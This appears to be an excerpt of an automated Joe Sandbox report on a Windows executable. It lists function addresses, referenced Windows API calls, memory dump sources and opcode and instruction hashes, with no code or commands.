                                                                                          • Opcode ID: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                                          • Instruction ID: a9962174cc9955717cb4d0c07479f79eb5b8938d38df77a1494ee0c12ad8e9ea
                                                                                          • Opcode Fuzzy Hash: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                                          • Instruction Fuzzy Hash: 5D415D22B1CA16C6EB10FB25D5553FCA3A0EB44B88FC54531EA8D476AAEF7CD444C720
                                                                                          Function 00007FF74D036258 Relevance: 3.1, APIs: 2, Instructions: 72windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconNotifyShell_
                                                                                          • String ID:
                                                                                          • API String ID: 1144537725-0
                                                                                          • Opcode ID: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                                          • Instruction ID: 96a2c9706043b31c19335d38db5e65fadc70c379e5e3c156085f6bb643c3ac61
                                                                                          • Opcode Fuzzy Hash: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                                          • Instruction Fuzzy Hash: CA415931A0CB86C6E755BF11E4403A9A3A4FB48B88F844535DE8D177A9EFBDE240C720
                                                                                          Function 00007FF74D033730 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsThemeActive.UXTHEME ref: 00007FF74D033756
                                                                                            • Part of subcall function 00007FF74D059334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF74D059348
                                                                                            • Part of subcall function 00007FF74D0336E8: SystemParametersInfoW.USER32 ref: 00007FF74D033705
                                                                                            • Part of subcall function 00007FF74D0336E8: SystemParametersInfoW.USER32 ref: 00007FF74D033725
                                                                                            • Part of subcall function 00007FF74D0337B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D0337F2
                                                                                            • Part of subcall function 00007FF74D0337B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D033807
                                                                                            • Part of subcall function 00007FF74D0337B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D03388D
                                                                                            • Part of subcall function 00007FF74D0337B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D033924
                                                                                          • SystemParametersInfoW.USER32 ref: 00007FF74D033797
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 4207566314-0
                                                                                          • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                          • Instruction ID: c782c179367edd5244b3c4bfb68a78ff15aded1e1a797c011a8a679b474dcb20
                                                                                          • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                          • Instruction Fuzzy Hash: 900124A0E0C243CAF724FB61B854278E261AF08300FC64135D8CC972B2FE7EA4848B60
                                                                                          Function 00007FF74D06B3C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 485612231-0
                                                                                          • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                          • Instruction ID: 7c2faadbd345c4f22bbe78bf15d47c8918ae65e4c4ed662237921e58f0bbc60a
                                                                                          • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                          • Instruction Fuzzy Hash: C3E08C51F0D507C2FF18BBF2A81D278A291AF58B40BC44438C88D8B272FE2CE4854A20
                                                                                          Function 00007FF74D0704B8 Relevance: 2.6, APIs: 2, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseErrorHandleLast
                                                                                          • String ID:
                                                                                          • API String ID: 918212764-0
                                                                                          • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                          • Instruction ID: 4936827f18dff1cdc9366c97f72691d41f5643076bb06082c5fe06e12d0b7b82
                                                                                          • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                          • Instruction Fuzzy Hash: AD11EC51B0C243C1FEA477A4A59837D91D15F54764FC40339DA9E0B3F2FD6CE4414221
                                                                                          Function 00007FF74D041475 Relevance: 2.0, APIs: 1, Instructions: 533COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer
                                                                                          • String ID:
                                                                                          • API String ID: 1385522511-0
                                                                                          • Opcode ID: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                                                          • Instruction ID: 27d8204bc3f71c294c8556903d84f253c8d703969e2cf68e9ebcfd6ca30cbdb8
                                                                                          • Opcode Fuzzy Hash: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                                                          • Instruction Fuzzy Hash: 5832AE22A0C692C6EB60FB15D4486BDA7A1EB84B84FD48135DE8E077B5FF3DE4418721
                                                                                          Function 00007FF74D0920D6 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClearVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1473721057-0
                                                                                          • Opcode ID: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                                                          • Instruction ID: 5a7093de33f9a9730cb8017ff509132a20e12d1db572b6bf2bb99fa0db85f179
                                                                                          • Opcode Fuzzy Hash: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                                                          • Instruction Fuzzy Hash: 7C418926B0CA41C6EB10FF60D0547ACA7A1EB44B88F844535CE8D177AAEFB8E495C760
                                                                                          Function 00007FF74D058FAC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                          • String ID:
                                                                                          • API String ID: 3947729631-0
                                                                                          • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                          • Instruction ID: 40e1f02d31cd6d481dda922bd58eb8a1e150be0557c17cf57c649d39a19eb335
                                                                                          • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                          • Instruction Fuzzy Hash: 5E41AE21E0C653C6EA64FB14F86027CA261AF45750FC6593ADE8E076E2FE3DE841C760
                                                                                          Function 00007FF74D076D04 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                          • Instruction ID: 0152340af708664ccf5f59a42fa2d653f49e5c12c5bf3f84231fa3a678aa3987
                                                                                          • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                          • Instruction Fuzzy Hash: 2E21A932F1C642C7D795BF25E450379B6A1EB84B94F944234DA9E8B6E5EF2CD800C710
                                                                                          Function 00007FF74D0648E0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                          • Instruction ID: feb8d1fcaa0466fd5880a304d2b9ea1c6a2a4b7ca58ce09e1fcd1df8b325f5f6
                                                                                          • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                          • Instruction Fuzzy Hash: F4218321B0C682C5EB61BF91941017ED2A5FF45B84F944031EACC57BA6FF7CD9518760
                                                                                          Function 00007FF74D06E258 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                                                          • Instruction ID: 2a415bbec5d9ca20a15affe694da8f9cb48d053ab7a95f68eb235ac08800cbe0
                                                                                          • Opcode Fuzzy Hash: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                                                          • Instruction Fuzzy Hash: DD111C32B1C783C6F620BF95A44467DE6A6FB44380F954435EACD476A6FF2CE8518B20
                                                                                          Function 00007FF74D0B5B80 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                                          • Instruction ID: 0a14f61c5b4bca3894b8a9bf01b71c47fbe2b5db656578e11b823b62a1423f43
                                                                                          • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                                          • Instruction Fuzzy Hash: 5D115826A1CA45C2EB04BF56D0883B8A360EB88F90F945232DA9E073B1DF3CD4908710
                                                                                          Function 00007FF74D070414 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                                          • Instruction ID: bebd9f862520bdead5f84de5e586d1eb8789e4f51fff37de983e8802aeb2b556
                                                                                          • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                                          • Instruction Fuzzy Hash: 13112EA2B1C646C6DA15BF90E4582BDB761AB94750FD04232E6CD0B6A5EE7CE001CB20
                                                                                          Function 00007FF74D0648EC Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                                          • Instruction ID: 58d791861992c4c3579e275a6dcdf119cae32df578c9571fa87efea7157a2e2e
                                                                                          • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                                          • Instruction Fuzzy Hash: 6E014461F4C207C1FE15BBF5941137992505F95764FA41730E9AD4B2F6FEACE4414234
                                                                                          Function 00007FF74D064970 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                                          • Instruction ID: ea1f32830036aa779f5019e4f1ba52bb36aeb73223009071da929fe355da3b73
                                                                                          • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                                          • Instruction Fuzzy Hash: 0CF0B421B4C203C6EA14B7F6B45117EA2909F40750FA41130E9DE872FBFE6CE4418731
                                                                                          Function 00007FF74D03652C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF74D064970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF74D064999
                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF74D07C8FE), ref: 00007FF74D03656F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3938577545-0
                                                                                          • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                                          • Instruction ID: a392cd6406f85f0b106149e187561a4245fc229d0c440829b244726255445efa
                                                                                          • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                                          • Instruction Fuzzy Hash: 32F03A52A0DB05C2EF19FF75C0553386260AB58F08F940530CA8E4B1A9EFACD4948261
                                                                                          Function 00007FF74D054C68 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF74D054C5C
                                                                                            • Part of subcall function 00007FF74D055600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF74D055609
                                                                                            • Part of subcall function 00007FF74D055600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF74D05561A
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                                          • String ID:
                                                                                          • API String ID: 1680350287-0
                                                                                          • Opcode ID: 8e577e6f8b8e95c99a6e9f34b5ad26aa57ee5c6d8527cbb39473b96b23732f7c
                                                                                          • Instruction ID: cc82cb35f3d47e53af1f8bec97eb25d77df0147e1febd7307696db5ba0180af3
                                                                                          • Opcode Fuzzy Hash: 8e577e6f8b8e95c99a6e9f34b5ad26aa57ee5c6d8527cbb39473b96b23732f7c
                                                                                          • Instruction Fuzzy Hash: 01E09250E1E157C5FAA8F9A115690B885400F99371EDA1B34DDBE4B2E2BD1CF4914230
                                                                                          Function 00007FF74D0AB334 Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
